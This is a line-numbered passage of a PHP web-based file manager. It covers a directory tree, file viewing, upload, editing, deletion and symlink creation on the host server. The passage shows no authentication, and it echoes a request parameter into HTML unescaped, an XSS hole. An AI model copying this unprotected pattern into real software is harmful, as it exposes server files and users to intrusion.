826.     switch ($iid) {
827.     case  1: $image .= "\23\0\22\0\242\4\0\0\0\0\377\377\377\314\314\314\231\231\231\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\23\0\22\0\0\3?H\272\334N \312\327@\270\30P%\273\237\213\205\215\244\240q\201\240\256\254:\234P\332\316o(\317l\215\342\255\36\363\71\230\5\270\362\15\211\2cr\300l:\231\60\310g\272\251Z\257\330l5\1\0;\0"; break;
828.     case  2: $image .= "\23\0\22\0\221\2\0\0\0\0\314\314\314\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\23\0\22\0\0\2\64\224\217\251\2\355\233@\230\24@#\251v\357d\15V^H\6\26fr\352\312\230ehI\337;\305\63}6\364\206\356\365\350\63!V\304\323\345\210L*\227\220\2\0;\0"; break;
829.     case  3: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\32\214o\200\313\355\255\236\234,\322+-\336K\363\357}[(^d9\235hP\0\0;\0"; break;
830.     case  4: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234\217\251\313\355\17\15\230\224:\20\262\16\340j\241u\15\226\201\231\310\140\302\272rC\207\36d\140\272\343\27z\333yUU\4\14\12\207DF\1\0;\0"; break;
831.     case  5: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2*\234\217\251\313\355\17\15\230\224:\20\262\16\340n\335\65\330\307y\302y\226]\210\214\37\273\270\33\254\310\340UU\321\316\367\376\317(\0\0;\0"; break;
832.     case  6: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\33\214o\200\313\355\255\236\234,\322+-\336K\371\360q\224\46rd\211\235\350\270\76\5\0;\0"; break;
833.     case  7: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2\60\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\206\204\304a\221R\0\0;\0"; break;
834.     case  8: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\5\207B\42\245\0\0;\0"; break;
835.     case  9: $image .= "\23\0\22\0\200\1\0\231\231\231\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\30\214o\200\313\355\255\236\234,\322+-\336K\371\360q\342H\226\346\211r\5\0;\0"; break;
836.     case 10: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2/\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\234\320\201PGr\46\263\11\256\373\15\312*\243\245f\253\270\247?\330O\11\12\207\304\242\260\0\0;\0"; break;
837.     case 11: $image .= "\23\0\22\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\23\0\22\0\0\2.\234o\200\313\355\255\236\234\11\330k%\10\274\207\350l\36\7B#\251\5\302\272~\203R\46\247\373\210c\274\330\36\216\140\76\5\14\12\207\304\140\1\0;\0"; break;
838.     case 12: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\0\0\0\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
839.     case 13: $image .= "\21\0\15\0\221\3\0\314\0\0\377\377\377\231\231\231\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2-\234\201\211\306\15\1\343j\354\211+\302\3\364D\231t\26\206i\342\207r\324Hf\252\203~o\25\264\227\271\306\322i\273\247\216s(\206\257\2\0;\0"; break;
840.     case 14: $image .= "\21\0\15\0\242\4\0\231\231\231\377\377\377\0\0\0\314\0\0\377\377\377\0\0\0\0\0\0\0\0\0!\371\4\1\350\3\4\0,\0\0\0\0\21\0\15\0\0\3\71H\12\334\254\60\202@\353\213p\212-\302\4\330RYM8\15\3\305y\46\205\216,\204\316s\260\305\12M\217 6\5/[\247\47\1\246\140\304\314\210\63l\301,\46\207\224\230\0\0;\0"; break;
841.     case 15: $image .= "\21\0\15\0\221\3\0\231\231\231\377\377\377\314\314\314\377\377\377!\371\4\1\350\3\3\0,\0\0\0\0\21\0\15\0\0\2*\234\217\231\300\254\33b\4\317\264\213\235\225\274\13:\0\201@\226\46\11\212\347\372m\354\231\216o\31\317\264k\267a\216\36\331o(\0\0;\0"; break;
842.     case 16: $image .= "\21\0\15\0\221\2\0\0\0\0\377\377\0\377\377\377\0\0\0!\371\4\1\350\3\2\0,\0\0\0\0\21\0\15\0\0\2,\224\217\251\2\355\260\14\10\263\322\65\203\336\32\246\7\66_\325P\245x\224\34\207J\344vzi\7wJf\342\62\202\263\21\23\372\11\17\5\0;\0"; break;
843.     case  0:
844.     default: $image .= "\23\0\22\0\200\1\0\0\0\0\377\377\377!\371\4\1\350\3\1\0,\0\0\0\0\23\0\22\0\0\2\20\214\217\251\313\355\17\243\234\264\332\213\263\336\274\327\2\0;\0"; break;
845.     }
846.     return $image;
847. }
848.  
849. function tree_hassubdirs ($path) {
850.     if ($p = @opendir($path)) {
851.         while (($filename = readdir($p)) !== FALSE) {
852.             if (tree_isrealdir($path . $filename)) return TRUE;
853.         }
854.     }
855.     return FALSE;
856. }
857.  
858. function tree_isrealdir ($path) {
859.     if (basename($path) != '.' && basename($path) != '..' && @is_dir($path) && !@is_link($path)) return TRUE; else return FALSE;
860. }
861.  
862. function treeview () {
863.     global $self, $treeroot;
864.     if (isset($_GET['plus']))   tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['plus']);
865.     if (isset($_GET['minus']))  $dirchanged = tree_minus($_SESSION['tree'], $_SESSION['hassubdirs'], $_GET['minus']); else $dirchanged = FALSE;
866.     for ($d = $_SESSION['dir']; strlen($d = dirname($d)) != 1; tree_plus($_SESSION['tree'], $_SESSION['hassubdirs'], $d));
867. ?>
868. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
869. <html>
870. <head>
871.     <title>Treeview</title>
872.     <style type="text/css">
873.     <!--
874.         td { font-family: sans-serif; font-size: 10pt; }
875.         a:link, a:visited, a:active { text-decoration: none; color: #000088; }
876.         a:hover { text-decoration: underline; color: #000088; }
877.     -->
878.     </style>
879. </head>
880. <body bgcolor="#FFFFFF"<?php if ($dirchanged) echo(" onLoad=\"void(parent.webadmin.location.replace('$self?noupdate=TRUE&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . "'))\""); ?>>
881.     <table border="0" cellspacing="0" cellpadding="0">
882. <?php
883.     tree_showtree($_SESSION['tree'], $_SESSION['hassubdirs'], $treeroot, 0, tree_calculatenumcols($_SESSION['tree'], $treeroot, 0));
884. ?>
885.     </table>
886. </body>
887. </html>
888. <?php
889.     return;
890. }
891.  
892. function frameset () {
893.     global $self;
894. ?>
895. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Frameset//EN">
896. <html>
897. <head>
898.     <title><?php echo($self); ?></title>
899. </head>
900. <frameset cols="250,*">
901.     <frame src="<?php echo("$self?frame=treeview&" . SID . '#' . urlencode($_SESSION['dir'])); ?>" name="treeview">
902.     <frame src="<?php echo("$self?" . SID); ?>" name="webadmin">
903. </frameset>
904. </html>
905. <?php
906.     return;
907. }
908.  
909. function tree_calculatenumcols ($tree, $path, $col) {
910.     static $numcols = 0;
911.     if ($col > $numcols) $numcols = $col;
912.     if (isset($tree[$path])) {
913.         for ($i = 0; $i < sizeof($tree[$path]); $i++) {
914.             $numcols = tree_calculatenumcols($tree, $path . $tree[$path][$i], $col + 1);
915.         }
916.     }
917.     return $numcols;
918. }
919.  
920. function tree_showtree ($tree, $hassubdirs, $path, $col, $numcols) {
921.     global $self, $treeroot;
922.     static $islast = array(0 => TRUE);
923.     echo("  <tr>\n");
924.     for ($i = 0; $i < $col; $i++) {
925.         if ($islast[$i]) $iid = 0; else $iid = 3;
926.         echo("      <td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
927.     }
928.     if ($hassubdirs[$path]) {
929.         if (!empty($tree[$path])) { $action = 'minus'; $iid = 8; } else { $action = 'plus'; $iid = 7; }
930.         if ($col == 0) $iid -= 3; else if ($islast[$col]) $iid += 3;
931.         echo("      <td><a href=\"$self?frame=treeview&$action=" . urlencode($path) . '&dir=' . urlencode($_SESSION['dir']) . '&' . SID . '#' . urlencode($path) . '">');
932.         echo("<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">");
933.         echo("</a></td>\n");
934.     } else {
935.         if ($islast[$col]) $iid = 9; else $iid = 6;
936.         echo("      <td><img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\"></td>\n");
937.     }
938.     if (@is_readable($path)) {
939.         $a1 = "<a name=\"" . urlencode($path) . "\" href=\"$self?dir=" . urlencode($path) . '&' . SID . '" target="webadmin">';
940.         $a2 = '</a>';
941.     } else {
942.         $a1 = $a2 = '';
943.     }
944.     if ($_SESSION['dir'] == $path) $iid = 2; else $iid = 1;
945.     echo("      <td>$a1<img src=\"$self?imageid=$iid\" width=\"19\" height=\"18\" border=\"0\">$a2</td>\n");
946.     $cspan = $numcols - $col + 1;
947.     if ($cspan > 1) $colspan = " colspan=\"$cspan\""; else $colspan = '';
948.     if ($col == $numcols) $width = ' width="100%"'; else $width = '';
949.     echo("      <td$width$colspan nowrap>&nbsp;");
950.     if ($path == $treeroot) $label = $path; else $label = basename($path);
951.     echo($a1 . htmlentities($label) . $a2);
952.     echo("</td>\n");
953.     echo("  </tr>\n");
954.     if (!empty($tree[$path])) {
955.         for ($i = 0; $i < sizeof($tree[$path]); $i++) {
956.             if (($i + 1) == sizeof($tree[$path])) $islast[$col + 1] = TRUE; else $islast[$col + 1] = FALSE;
957.             tree_showtree($tree, $hassubdirs, $path . $tree[$path][$i], $col + 1, $numcols);
958.         }
959.     }
960.     return;
961. }
962.  
963. function tree_plus (&$tree, &$hassubdirs, $p) {
964.     if ($path = spath(realpath($p))) {
965.         $tree[$path] = tree_getsubdirs($path);
966.         for ($i = 0; $i < sizeof($tree[$path]); $i++) {
967.             $subdir = $path . $tree[$path][$i];
968.             if (empty($hassubdirs[$subdir])) $hassubdirs[$subdir] = tree_hassubdirs($subdir);
969.         }
970.     }
971.     return;
972. }
973.  
974. function tree_minus (&$tree, &$hassubdirs, $p) {
975.     $dirchanged = FALSE;
976.     if ($path = spath(realpath($p))) {
977.         if (!empty($tree[$path])) {
978.             for ($i = 0; $i < sizeof($tree[$path]); $i++) {
979.                 $subdir = $path . $tree[$path][$i] . '/';
980.                 if (isset($hassubdirs[$subdir])) $hassubdirs[$subdir] = NULL;
981.             }
982.             $tree[$path] = NULL;
983.             if (substr($_SESSION['dir'], 0, strlen($path)) == $path) {
984.                 $_SESSION['dir'] = $path;
985.                 $dirchanged = TRUE;
986.             }
987.         }
988.     }
989.     return $dirchanged;
990. }
991.  
992. function tree_getsubdirs ($path) {
993.     $subdirs = array();
994.     if ($p = @opendir($path)) {
995.         for ($i = 0; ($filename = readdir($p)) !== FALSE;) {
996.             if (tree_isrealdir($path . $filename)) $subdirs[$i++] = $filename . '/';
997.         }
998.     }
999.     sort($subdirs);
1000.     return $subdirs;
1001. }
1002.  
1003. function show ($file) {
1004.     global $words;
1005.     if (@is_readable($file) && @is_file($file)) {
1006.         header('Content-Disposition: filename=' . basename($file));
1007.         header('Content-Type: ' . getmimetype($file));
1008.         if (@readfile($file) !== FALSE) return TRUE;
1009.     }
1010.     return FALSE;
1011. }
1012.  
1013. function show_highlight ($file) {
1014.     global $words;
1015.     if (@is_readable($file) && @is_file($file)) {
1016.         header('Content-Disposition: filename=' . basename($file));
1017.         echo("<html>\n<head><title>");
1018.         echo(buildphrase(array('&quot;' . htmlentities(basename($file)) . '&quot;'), $words['sourceof']));
1019.         echo("</title></head>\n<body>\n<table cellpadding=\"4\" border=\"0\">\n<tr>\n<td>\n<code style=\"color: #999999\">\n");
1020.         $size = sizeof(file($file));
1021.         for ($i = 1; $i <= $size; $i++) printf("%05d<br>\n", $i);
1022.         echo("</code>\n</td>\n<td nowrap>\n");
1023.         $shown = @highlight_file($file);
1024.         echo("\n");
1025.         echo("</td>\n</tr>\n</table>\n");
1026.         echo("</body>\n");
1027.         echo("</html>");
1028.         if ($shown) return TRUE;
1029.     }
1030.     return FALSE;
1031. }
1032.  
1033. function getmimetype ($file) {
1034.     /* $mime = 'application/octet-stream'; */
1035.     $mime = 'text/plain';
1036.     $ext = substr($file, strrpos($file, '.') + 1);
1037.     if (@is_readable('/etc/mime.types')) {
1038.         $f = fopen('/etc/mime.types', 'r');
1039.         while (!feof($f)) {
1040.             $line = fgets($f, 4096);
1041.             $found = FALSE;
1042.             $mim = strtok($line," \n\t");
1043.             $ex = strtok(" \n\t");
1044.             while ($ex && !$found) {
1045.                 if (strtolower($ex) == strtolower($ext)) {
1046.                     $found = TRUE;
1047.                     $mime = $mim;
1048.                     break;
1049.                 }
1050.                 $ex = strtok(" \n\t");
1051.             }
1052.             if ($found) break;
1053.         }
1054.         fclose($f);
1055.     }
1056.     return $mime;
1057. }
1058.  
1059. function dirlisting ($inaframe = FALSE) {
1060.     global $self, $homedir, $words;
1061.     global $error, $notice;
1062.     $p = '&' . SID;
1063.     html_header($_SESSION['dir']);
1064. ?>
1065.     <form action="<?php echo($self); ?>" method="get">
1066.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
1067.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
1068.     <table border="0" cellspacing="1" cellpadding="4">
1069.     <tr>
1070.         <td bgcolor="#EEEEEE" align="center"><b><?php echo(htmlentities($_SERVER['SERVER_NAME'])); ?></b></td>
1071.         <td bgcolor="#EEEEEE" align="center"><?php echo(htmlentities($_SERVER['SERVER_SOFTWARE'])); ?></td>
1072.     </tr>
1073.     <tr>
1074.         <td bgcolor="#EEEEEE" colspan="2">
1075.             <table border="0" cellspacing="0" cellpadding="0">
1076.             <tr>
1077.                 <td><?php echo("<a href=\"$self?dir=" . urlencode($homedir) . "$p\">" . $words['dir']); ?></a>:&nbsp;</td>
1078.                 <td><input type="text" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>" size="<?php echo(textfieldsize($_SESSION['dir'])); ?>">&nbsp;</td>
1079.                 <td><input type="submit" value="<?php echo($words['change']); ?>"></td>
1080.             </tr>
1081.             </table>
1082.         </td>
1083.     </tr>
1084.     </table>
1085.     </td></tr></table>
1086.     </form>
1087. <?php if (@is_writable($_SESSION['dir'])) { ?>
1088.     <form action="<?php echo($self); ?>" method="post" enctype="multipart/form-data">
1089.     <input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
1090.     <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
1091. <?php if (isset($_REQUEST['frame'])) { ?>
1092.     <input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
1093. <?php } ?>
1094.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
1095.     <table border="0" cellspacing="1" cellpadding="4">
1096.     <tr>
1097.         <td bgcolor="#EEEEEE">
1098.             <table border="0" cellspacing="0" cellpadding="0">
1099.             <tr>
1100.                 <td><?php echo($words['file']); ?>&nbsp;</td>
1101.                 <td><input type="file" name="upload">&nbsp;</td>
1102.                 <td><input type="submit" value="<?php echo($words['upload']); ?>"></td>
1103.             </tr>
1104.             </table>
1105.         </td>
1106.     </tr>
1107.     <tr>
1108.         <td bgcolor="#EEEEEE">
1109.             </form>
1110.             <form action="<?php echo($self); ?>" method="get">
1111.             <input type="hidden" name="dir" value="<?php echo(htmlentities($_SESSION['dir'])); ?>">
1112.             <input type="hidden" name="id" value="<?php echo(session_id()); ?>">
1113. <?php if (isset($_REQUEST['frame'])) { ?>
1114.             <input type="hidden" name="frame" value="<?php echo($_REQUEST['frame']); ?>">
1115. <?php } ?>
1116.             <table border="0" cellspacing="0" cellpadding="0">
1117.             <tr>
1118.                 <td>
1119.                     <select name="type" size="1">
1120.                     <option value="file"><?php echo($words['file']); ?>
1121.  
1122.                     <option value="dir" selected><?php echo($words['dir']); ?>
1123.  
1124.                     </select>&nbsp;
1125.                 </td>
1126.                 <td><input type="text" name="create">&nbsp;</td>
1127.                 <td><input type="submit" value="<?php echo($words['create']); ?>"></td>
1128.             </tr>
1129.             </table>
1130.         </td>
1131.     </tr>
1132.     </table>
1133.     </td></tr></table>
1134.     </form>
1135. <?php
1136.     }
1137.     if (empty($_GET['sort'])) $sort = 'filename'; else $sort = $_GET['sort'];
1138.     $reverse = @$_GET['reverse'];
1139.     $GLOBALS['showsize'] = FALSE;
1140.     if ($files = dirtoarray($_SESSION['dir'])) {
1141.         $files = sortfiles($files, $sort, $reverse);
1142.         outputdirlisting($_SESSION['dir'], $files, $inaframe, $sort, $reverse);
1143.     } else {
1144.         perror(buildphrase('&quot;<b>' . htmlentities($_SESSION['dir']) . '</b>&quot', $words['readingerror']));
1145.     }
1146.     if ($inaframe) {
1147.         pnotice("<a href=\"$self?action=treeoff&" . SID . '" target="_top">' . $words['treeoff'] . '</a>');
1148.     } else {
1149.         pnotice("<a href=\"$self?action=treeon&" . SID . '" target="_top">' . $words['treeon'] . '</a>');
1150.     }
1151.     html_footer(FALSE);
1152.     return;
1153. }
1154.  
1155. function dirtoarray ($dir) {
1156.     if ($dirstream = @opendir($dir)) {
1157.         for ($n = 0; ($filename = readdir($dirstream)) !== FALSE; $n++) {
1158.             $stat = @lstat($dir . $filename);
1159.             $files[$n]['filename']     = $filename;
1160.             $files[$n]['fullfilename'] = $fullfilename = relpathtoabspath($filename, $dir);
1161.             $files[$n]['is_file']      = @is_file($fullfilename);
1162.             $files[$n]['is_dir']       = @is_dir($fullfilename);
1163.             $files[$n]['is_link']      = $islink = @is_link($dir . $filename);
1164.             if ($islink) {
1165.                 $files[$n]['readlink'] = @readlink($dir . $filename);
1166.                 $files[$n]['linkinfo'] = linkinfo($dir . $filename);
1167.             }
1168.             $files[$n]['is_readable']   = @is_readable($fullfilename);
1169.             $files[$n]['is_writable']   = @is_writable($fullfilename);
1170.             $files[$n]['is_executable'] = @is_executable($fullfilename);
1171.             $files[$n]['permission']    = $islink ? 'lrwxrwxrwx' : octtostr(@fileperms($dir . $filename));
1172.             if (substr($files[$n]['permission'], 0, 1) != '-') {
1173.                 $files[$n]['size'] = -1;
1174.             } else {
1175.                 $files[$n]['size'] = @$stat['size'];
1176.                 $GLOBALS['showsize'] = TRUE;
1177.             }
1178.             $files[$n]['owner']         = $owner = @$stat['uid'];
1179.             $files[$n]['group']         = $group = @$stat['gid'];
1180.             echo "";
1181.             $files[$n]['ownername']     = (function_exists('posix_getpwuid')) ? @reset(posix_getpwuid($owner)) : "none";
1182.             $files[$n]['groupname']     = (function_exists('posix_getgrgid')) ? @reset(posix_getgrgid($group)) : "none";
1183.         }
1184.         closedir($dirstream);
1185.         return $files;
1186.     } else {
1187.         return FALSE;
1188.     }
1189. }
1190.  
1191. function outputdirlisting ($dir, $files, $inaframe, $sort, $reverse) {
1192.     global $self, $words;
1193.     $uid = getmyuid();
1194. ?>
1195.     <p>
1196.     <table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
1197.     <table border="0" cellspacing="1" cellpadding="4">
1198. <?php
1199.     if ($inaframe) $p = '&notreeupdate=TRUE&'; $p = ''; $p .= SID . '&dir=' . urlencode($dir);
1200.     echo("  <tr>\n");
1201.     echo("      <td bgcolor=\"#EEEEEE\"><img src=\"$self?imageid=16\" width=\"17\" height=\"13\"></td>\n");
1202.     echo("      <td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=filename&reverse=" . (($sort == 'filename') ? !$reverse : 0) . "&$p\"><b>{$words['filename']}</b></a></td>\n");
1203.     if ($GLOBALS['showsize']) echo("        <td bgcolor=\"#EEEEEE\" align=\"right\"><a href=\"$self?sort=size&reverse=" . (($sort == 'size') ? !$reverse : 0) . "&$p\"><b>{$words['size']}</b></a></td>\n");
1204.     echo("      <td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=permission&reverse=" . (($sort == 'permission') ? !$reverse : 0) . "&$p\"><b>{$words['permission']}</b></a></td>\n");
1205.     echo("      <td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=owner&reverse=" . (($sort == 'owner') ? !$reverse : 0) . "&$p\"><b>{$words['owner']}</b></a></td>\n");
1206.     echo("      <td bgcolor=\"#EEEEEE\"><a href=\"$self?sort=group&reverse=" . (($sort == 'group') ? !$reverse : 0) . "&$p\"><b>{$words['group']}</b></a></td>\n");
1207.     echo("      <td bgcolor=\"#EEEEEE\"><b>{$words['functions']}</b></td>\n");
1208.     echo("  </tr>\n");
1209.     $p = '&' . SID;
1210.     if ($GLOBALS['showsize']) $cspan = ' colspan="2"'; else $cspan = '';
1211.     foreach ($files as $file) {
1212.         echo("  <tr>\n");
1213.         if ($file['is_link']) {
1214.             echo("      <td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=14\" width=\"17\" height=\"13\"></td>\n");
1215.             echo("      <td$cspan bgcolor=\"#FFFFFF\">");
1216.             if ($file['is_dir']) echo('[ ');
1217.             echo($file['filename']);
1218.             if ($file['is_dir']) echo(' ]');
1219.             echo(' -&gt; ');
1220.             if ($file['is_dir']) {
1221.                 echo('[ ');
1222.                 if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['readlink']) . "$p\">");
1223.                 echo(htmlentities($file['readlink']));
1224.                 if ($file['is_readable']) echo('</a>');
1225.                 echo(' ]');
1226.             } else {
1227.                 if (dirname($file['readlink']) != '.') {
1228.                     if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode(dirname($file['readlink'])) . "$p\">");
1229.                     echo(htmlentities(dirname($file['readlink'])) . '/');
1230.                     if ($file['is_readable']) echo('</a>');
1231.                 }
1232.                 if (strlen(basename($file['readlink'])) != 0) {
1233.                     if ($file['is_file'] && $file['is_readable']) echo("<a href=\"$self?show=" . urlencode($file['readlink']) . "$p\">");
1234.                     echo(htmlentities(basename($file['readlink'])));
1235.                     if ($file['is_file'] && $file['is_readable']) echo('</a>');
1236.                 }
1237.                 if ($file['is_file'] && is_script($file['readlink'])) echo(" <a href=\"$self?showh=" . urlencode($file['readlink']) . "$p\">*</a>");
1238.             }
1239.             echo("</td>\n");
1240.         } elseif ($file['is_dir']) {
1241.             echo("      <td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=15\" width=\"17\" height=\"13\"></td>\n");
1242.             echo("      <td$cspan bgcolor=\"#FFFFFF\">[ ");
1243.             if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['fullfilename']) . "$p\">");
1244.             echo(htmlentities($file['filename']));
1245.             if ($file['is_readable']) echo('</a>');
1246.             echo(" ]</td>\n");
1247.         } else {
1248.             echo("      <td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=");
1249.             if (substr($file['filename'], 0, 1) == '.') echo('13'); else echo('12');
1250.             echo("\" width=\"17\" height=\"13\"></td>\n");
1251.             echo('      <td');
1252.             if (substr($file['permission'], 0, 1) != '-') echo($cspan);
1253.             echo(' bgcolor="#FFFFFF">');
1254.             if ($file['is_readable'] && $file['is_file']) echo("<a href=\"$self?show=" . urlencode($file['fullfilename']) . "$p\">");
1255.             echo(htmlentities($file['filename']));
1256.             if ($file['is_readable'] && $file['is_file']) echo('</a>');
1257.             if ($file['is_file'] && is_script($file['filename'])) echo(" <a href=\"$self?showh=" . urlencode($file['fullfilename']) . "$p\">*</a>");
1258.             echo("</td>\n");
1259.             if ($GLOBALS['showsize'] && $file['is_file']) {
1260.                 echo("      <td bgcolor=\"#FFFFFF\" align=\"right\" nowrap>");
1261.                 if ($file['is_file']) echo("{$file['size']} B");
1262.                 echo("</td>\n");
1263.             }
1264.         }
1265.         echo('      <td bgcolor="#FFFFFF" class="perm">');
1266.         if ($uid == $file['owner'] && !$file['is_link']) echo("<a href=\"$self?permission=" . urlencode($file['fullfilename']) . "$p\">");
1267.         echo($file['permission']);
1268.         if ($uid == $file['owner'] && !$file['is_link']) echo('</a>');
1269.         echo("</td>\n");
1270.         $owner = ($file['ownername'] == NULL) ? $file['owner'] : $file['ownername'];
1271.         $group = ($file['groupname'] == NULL) ? $file['group'] : $file['groupname'];
1272.         echo('      <td bgcolor="#FFFFFF">' . $owner . "</td>\n");
1273.         echo('      <td bgcolor="#FFFFFF">' . $group . "</td>\n");
1274.         $f = "<a href=\"$self?symlinktarget=" . urlencode($dir . $file['filename']). "$p\">{$words['createsymlink']}</a> | ";;
1275.         if ($file['filename'] != '.' && $file['filename'] != '..') {
1276.             if ($file['is_readable'] && $file['is_file']) {
1277.                 $f .= "<a href=\"$self?cpy=" . urlencode($file['fullfilename']). "$p\">{$words['copy']}</a> | ";
1278.             }
1279.             if ($uid == $file['owner']) {
1280.                 $f .= "<a href=\"$self?move=" . urlencode($file['fullfilename']) . "$p\">{$words['move']}</a> | ";
1281.                 $f .= "<a href=\"$self?delete=" . urlencode($dir . $file['filename']). "$p\">{$words['delete']}</a> | ";
1282.             }
1283.             if ($file['is_writable'] && $file['is_file']) {
1284.                 $f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . "$p\">{$words['edit']}</a> | ";
1285.             }
1286.         }
1287.         if ($file['is_dir'] && @is_file($file['fullfilename'] . '.htaccess') && @is_writable($file['fullfilename'] . '.htaccess')) {
1288.             $f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . '.htaccess' . "$p\">{$words['configure']}</a> | ";
1289.         }
1290.         if (!empty($f)) $f = substr($f, 0, strlen($f) - 3); else $f = '&nbsp;';
1291.         echo("      <td bgcolor=\"#FFFFFF\" nowrap>$f</td>\n");
1292.         echo("  </tr>\n");
1293.     }
1294. ?>
1295.     </table>
1296.     </td></tr></table>
1297.     </p>
1298. <?php
1299.     return;
1300. }
1301.  
1302. function sortfiles ($files, $sort, $reverse) {
1303.     $files = sortfield($files, $sort, $reverse, 0, sizeof($files) - 1);
1304.     if ($sort != 'filename') {
1305.         $old = $files[0][$sort]; $oldpos = 0;
1306.         for ($i = 1; $i < sizeof($files); $i++) {
1307.             if ($old != $files[$i][$sort]) {
1308.                 if ($oldpos != ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
1309.                 $oldpos = $i;
1310.             }
1311.             $old = $files[$i][$sort];
1312.         }
1313.         if ($oldpos < ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
1314.     }
1315.     return $files;
1316. }
1317.  
1318. function octtostr ($mode) {
1319.     if     (($mode & 0xC000) === 0xC000) $type = 's'; /* Unix domain socket */
1320.     elseif (($mode & 0x4000) === 0x4000) $type = 'd'; /* Directory */
1321.     elseif (($mode & 0xA000) === 0xA000) $type = 'l'; /* Symbolic link */
1322.     elseif (($mode & 0x8000) === 0x8000) $type = '-'; /* Regular file */
1323.     elseif (($mode & 0x6000) === 0x6000) $type = 'b'; /* Block special file */
1324.     elseif (($mode & 0x2000) === 0x2000) $type = 'c'; /* Character special file */
1325.     elseif (($mode & 0x1000) === 0x1000) $type = 'p'; /* Named pipe */
1326.     else                                 $type = '?'; /* Unknown */
1327.     $owner  = ($mode & 00400) ? 'r' : '-';
1328.     $owner .= ($mode & 00200) ? 'w' : '-';
1329.     if ($mode & 0x800) $owner .= ($mode & 00100) ? 's' : 'S'; else $owner .= ($mode & 00100) ? 'x' : '-';
1330.     $group  = ($mode & 00040) ? 'r' : '-';
1331.     $group .= ($mode & 00020) ? 'w' : '-';
1332.     if ($mode & 0x400) $group .= ($mode & 00010) ? 's' : 'S'; else $group .= ($mode & 00010) ? 'x' : '-';
1333.     $other  = ($mode & 00004) ? 'r' : '-';
1334.     $other .= ($mode & 00002) ? 'w' : '-';
1335.     if ($mode & 0x200) $other .= ($mode & 00001) ? 't' : 'T'; else $other .= ($mode & 00001) ? 'x' : '-';
1336.     return $type . $owner . $group . $other;
1337. }
1338.  
1339. function sortfield ($field, $column, $reverse, $left, $right){
1340.     $g = $field[(int) (($left + $right) / 2)][$column];
1341.     $l = $left; $r = $right;
1342.     while ($l <= $r) {
1343.         if ($reverse) {
1344.             while (($l < $right) && ($field[$l][$column] > $g)) $l++;
1345.             while (($r > $left)  && ($field[$r][$column] < $g)) $r--;
1346.         } else {
1347.             while (($l < $right) && ($field[$l][$column] < $g)) $l++;
1348.             while (($r > $left)  && ($field[$r][$column] > $g)) $r--;
1349.         }
1350.         if ($l < $r) {
1351.             $tmp = $field[$r];
1352.             $field[$r] = $field[$l];
1353.             $field[$l] = $tmp;
1354.             $r--;
1355.             $l++;
1356.         } else {
1357.             $l++;
1358.         }
1359.     }
1360.     if ($r > $left) $field = sortfield($field, $column, $reverse, $left, $r);
1361.     if ($r + 1 < $right) $field = sortfield($field, $column, $reverse, $r + 1, $right);
1362.     return $field;
1363. }
1364.  
